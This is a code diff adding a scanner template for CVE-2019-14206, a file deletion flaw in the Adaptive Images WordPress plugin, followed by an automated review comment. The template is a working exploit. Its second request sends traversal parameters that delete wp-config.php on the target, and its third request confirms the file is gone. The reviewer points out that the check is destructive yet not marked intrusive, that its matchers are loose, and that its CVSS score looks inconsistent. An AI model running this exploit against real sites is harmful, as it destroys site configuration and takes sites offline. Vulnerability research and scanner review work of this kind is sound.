diff --git a/http/cves/2019/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml
new file mode 100644
index 000000000000..9a254ca0cc79
--- /dev/null
+++ b/http/cves/2019/CVE-2019-14206.yaml
@@ -0,0 +1,60 @@
+id: CVE-2019-14206
+
+info:
+ name: Nevma Adaptive Images < 0.6.67 - Arbitrary File Deletion
+ author: D3nverNg, thewindghost
+ severity: High
+ description: |
+ Nevma Adaptive Images plugin before 0.6.67 for WordPress allows arbitrary file deletion
+ via unsanitized input in adaptive-images-script.php. Remote attackers can delete arbitrary
+ files by sending specially crafted request parameters.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
+ - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+ - https://wordpress.org/plugins/adaptive-images/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2019-14206
+ cwe-id: CWE-22
+ metadata:
+ verified: true
+ max-request: 3
+ tags: cve,cve2019,wordpress,wp-plugin,file-deletion,adaptive-images
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+
+ extractors:
+ - type: regex
+ name: image_source
+ part: body
+ regex:
+ - '(\/wp-content\/uploads\/[0-9]{4}\/[0-9]{2}\/[a-zA-Z0-9_\-]+\.(?:jpg|jpeg|png))'
+ group: 1
+ internal: true
+
+ - method: GET
+ path:
+ - "{{BaseURL}}{{image_source}}?adaptive-images-settings[source_file]=../../../{{image_source}}&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"
+
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-config.php"
+
+ matchers:
+ - type: status
+ status:
+ - 404
+ - type: word
+ part: body
+ words:
+ - "Not Found"
+ condition: or
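Review bot: A positive result from this template means the scanned site has lost its `wp-config.php`, because the second request block targets that file and the third block confirms the outcome by expecting a 404, yet nothing in `info` marks the check as destructive. The tags line should carry the project's intrusive marker, `tags: cve,cve2019,wordpress,wp-plugin,file-deletion,adaptive-images,intrusive`, and the description should state that a successful run removes the file, so operators can exclude it from routine scans. The matchers also look too loose: the second block matches on any 200 for an uploaded image, and the third block appears to stand on its own, so a host that simply answers 404 for `/wp-config.php` (for example a non-WordPress site) may be reported without the earlier request ever succeeding. Separately, `severity: High` should be lowercase `high`, and the 7.5 score does not look consistent with a vector carrying both `I:H` and `A:H`, so it is worth rechecking against the NVD entry.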